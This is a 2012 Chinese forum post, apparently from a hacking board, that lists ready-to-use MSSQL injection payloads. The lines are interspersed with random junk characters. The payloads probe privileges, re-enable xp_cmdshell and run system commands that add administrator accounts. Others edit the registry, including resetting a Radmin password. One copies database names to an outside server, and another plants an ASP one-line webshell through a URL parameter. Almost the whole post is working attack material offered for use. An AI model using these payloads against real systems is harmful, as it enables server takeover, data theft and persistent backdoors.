找回密码
 立即注册
查看: 2389|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令% x7 e$ Q* m* x( K- S
//看看是什么权限的
5 ]& |+ ]# x# f5 s+ E  a$ E/ D! uand 1=(Select IS_MEMBER('db_owner'))
+ @- J/ Y8 Q! ?+ @# i* {( oAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
$ k  O# K* ?$ F: I/ c, b
. t" M! x4 {! q$ A//检测是否有读取某数据库的权限% x1 B: d( B' z% E
and 1= (Select HAS_DBACCESS('master'))( D( s. A  b7 V
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
6 K; i4 b6 M, A8 G$ `8 m, t; J4 a" F; v

6 q! G: |" N5 j2 e0 [数字类型
: ?  W  b3 c' \7 F8 R# Kand char(124)%2Buser%2Bchar(124)=0
( D1 C; K7 L$ P9 x8 q! [
6 Y' i( T" t( h1 N0 _+ w5 J+ _字符类型5 G( A4 m! c8 v1 l& T6 L8 ?
' and char(124)%2Buser%2Bchar(124)=0 and ''='
5 w6 b4 P, J& F9 a2 b* ]5 f' J+ U8 B; n- p
搜索类型. [3 E+ y0 @7 b; m7 S
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
# ~+ ?3 m/ t; S4 j1 H- Q; P2 i6 s, E( f, e
爆用户名
; g& C5 \' n) ^4 f/ Mand user>0- h) Z$ ^3 j+ i- Z" Y5 Z1 S+ O  @# E
' and user>0 and ''='
0 S( U/ X/ a6 P/ w2 L9 A* l5 }5 A$ g, K- U- }  ~
检测是否为SA权限$ V$ P2 S5 _" d7 h
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--# W: f8 h  Z% b0 u8 W, ^2 L  t0 C
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --4 X5 i8 t; G+ W, |5 S" b
4 D9 _* I( h" i( b. a
检测是不是MSSQL数据库) X9 n8 |7 p3 z0 ?
and exists (select * from sysobjects);-- * g, |: {8 m' _  J
3 x& I/ S4 Y9 {3 J/ C3 v  I. b
检测是否支持多行5 [% r5 Q, |& N6 A, e! x) s) T
;declare @d int;--
. ]& E# J( C2 Z& _/ t3 C+ {5 Z7 F! c& G. Q& a. s
恢复 xp_cmdshell
9 I+ [% P* m1 d- ?; O' [  u;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--$ F# \2 V! f; W

$ h9 C( K" n/ {$ m6 z4 G* w) A5 c) S7 N  m
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 2 Z) L, w1 w$ t

8 M, v$ S- y6 N0 k//-----------------------. r1 v, A3 u( @. ^# I
//      执行命令$ `4 z+ m1 o$ W1 A1 Y3 k/ e# |
//-----------------------
: ?. R" m) W) q- d首先开启沙盘模式:
* d- d4 B. H" a/ \: \+ Kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 g5 `! R5 E4 ^. n5 K

! \2 D" I: D& Z8 K, J$ B* j* K& {然后利用jet.oledb执行系统命令
: E1 M8 v+ n9 [/ nselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')# i7 M2 v  T- J0 J" f4 Y$ J

9 U- d4 W! c+ D3 V执行命令
2 e* ~3 [9 f, N/ v9 W# A  f& {1 k; F;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--7 l$ t: n' U! }& u6 X% A
- R9 r8 t  X: z  D8 l7 H. J0 K
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) p+ m, R; S" @1 o3 i% M( ~( X: m4 U2 [; k+ t
判断xp_cmdshell扩展存储过程是否存在:  `# W# A7 B; K
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" s9 l( q; J* P! G
( Z5 s) r$ H( u+ F3 N9 i( G* w写注册表
$ ^4 e: }: X8 L* x' N. k% Uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 e1 a) q7 J' A% I$ j8 n

" f" k% z. q$ \: X9 L1 h7 zREG_SZ) f. X  r+ i. i, S
0 U: d2 F! m4 o* Z! G% J; d
读注册表
& U& {$ Q6 s3 u7 H2 aexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& p9 T3 t! I  E8 [( q8 H& P" P  L$ D: s; m
读取目录内容
4 d6 L& Z* |6 l! \- Dexec master..xp_dirtree 'c:\winnt\system32\',1,1, _1 j. m6 Y: X" U8 F4 t9 p/ g

) M& `) n- D4 k3 D) X% e* F% d4 h. c9 E
数据库备份9 d' t. t; h% G& d$ q
backup database pubs to disk = 'c:\123.bak'  X" s% _  A& Q" o: T3 k

. n  S/ \- }6 C- o0 j! `//爆出长度
6 h* Z; {* Q. g4 HAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--/ t3 s8 `! I% I* x/ v, J" @
- B- |' I4 V% L& b0 y! i
, `, q3 d* ]; ^* K, z3 `
$ i& g7 V/ T4 ^4 k: K
更改sa口令方法:用sql综合利用工具连接后,执行命令:
+ G  g5 a& z5 M# |# R, Pexec sp_password NULL,'新密码','sa'
, k+ f2 d0 i/ E: o" D% l
! C) \6 w4 f; k添加和删除一个SA权限的用户test:- ]& ^/ X: F* J# M4 r6 z1 W
exec master.dbo.sp_addlogin test,ptlove
$ y) P  P( T& a# Xexec master.dbo.sp_addsrvrolemember test,sysadmin
" r; d( ?$ T' I& i
% _! W$ P; ~4 q, o删除扩展存储过过程xp_cmdshell的语句: * C2 b" `" l, L7 `) z' _
exec sp_dropextendedproc 'xp_cmdshell'" G- X. ?' j+ ]

, n+ ^$ t8 }, _' w添加扩展存储过过程. Z9 N) o! M1 g6 C
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. B3 y: [8 H4 o, [" PGRANT exec On xp_proxiedadata TO public
  Y' o/ r4 I! O4 j9 X! {! h
; I7 w* g! O5 Q- j/ ?$ t0 R3 z* s2 s9 ~
停掉或激活某个服务。
. G8 x- M" o& K, c
; V# \) Z* ]# N* ]* y- ]exec master..xp_servicecontrol 'stop','schedule'
9 n) e; H9 d: Z7 `exec master..xp_servicecontrol 'start','schedule'8 M/ M* i2 J6 R; T% S$ J
% `. w' g9 l- h7 z5 n2 @
dbo.xp_subdirs
5 O3 R3 Q) V7 s! {6 D" A
7 o: R2 l/ d! I+ R6 ~只列某个目录下的子目录。
) n% @. _& i3 v( uxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'. w* }) [1 ?6 z8 D( ^6 M5 a7 P
+ H7 u+ s+ @0 F( u- ~7 c' n3 w
dbo.xp_makecab' a, `; X2 a5 a. o$ n& A

6 Z3 A  J' }' l将目标多个档案压缩到某个目标档案之内。
% L9 r" R9 R+ Y6 a4 H3 a所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 v4 d$ t. f  k+ T- A
* |8 I+ \9 a9 y$ Q
dbo.xp_makecab
4 i, ~  n; ?( ]8 j0 p2 w'c:\test.cab','mszip',1,2 |* F/ N9 G  g  Z( Z1 V
'C:\Inetpub\wwwroot\SQLInject\login.asp'," h% @$ I" Z% m# Z2 L0 ~' r: w
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'3 k% _+ O! S1 y

6 }: j: {0 Z" [+ u- Fxp_terminate_process8 `) B" Y9 d# R; k

! `) o% T5 @6 ^  D; c* n/ K3 U9 @停掉某个执行中的程序,但赋予的参数是 Process ID。
- x" E7 o' l# X5 D4 L8 S2 |/ W利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID+ t& B; S: k2 u5 @* |; Y9 w
0 [# k% A9 o/ t* F% ], j2 r6 h
xp_terminate_process 2484
. V4 Q- O) p0 `+ |
% b1 q+ g! v  d$ ^& m8 Axp_unpackcab' c7 d0 F  @$ x4 p4 r; F/ G
& p0 x' ^1 o$ w  A
解开压缩档。' K* i5 M+ r% @
) Q9 m/ r- w2 M) F: c$ j
xp_unpackcab 'c:\test.cab','c:\temp',13 ?7 [) I" Q% y% a
: }. w; `% J' p# O+ A
6 h% j$ S, T) A0 N" X7 k
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
8 n/ V! t9 N& N" Z+ q' c5 r/ R4 R8 e2 x- P
create database lcx;
: [3 q' T% V7 y; ]Create TABLE ku(name nvarchar(256) null);, l+ F4 P" _, H: o* A# b$ B' q
Create TABLE biao(id int NULL,name nvarchar(256) null);. k# K5 F$ T+ r" Z) ~1 C6 A0 h

: }( t# Q" X# s: Q. |. d, Q//得到数据库名1 A. L5 ?7 w$ S% s! N$ x" g
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases  J7 x  z1 b3 v3 N5 t8 g. X

) l9 {$ S( M9 c/ A: C; f7 n$ I* ~; j$ u; D! ~0 W5 [
//在Master中创建表,看看权限怎样
) p* T7 d3 N: F  d$ v$ y. F/ PCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
7 V. [7 b/ i9 p- H
0 h% F* w# H$ l3 ~8 Q) z用 sp_makewebtask直接在web目录里写入一句话马:
0 y8 r# F" v& Y# \# g) nhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--5 v9 O7 X7 P6 }: n! P
) A/ Q/ N1 ^* V" E# C
//更新表内容. U2 h& A; W9 W  c, y& c
Update films SET kind = 'Dramatic' Where id = 123
( \9 b0 B2 b7 |; f- ~
+ ?: j* r" [3 f, F6 D3 O//删除内容$ |' l0 W! w3 X, T5 K) Z
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表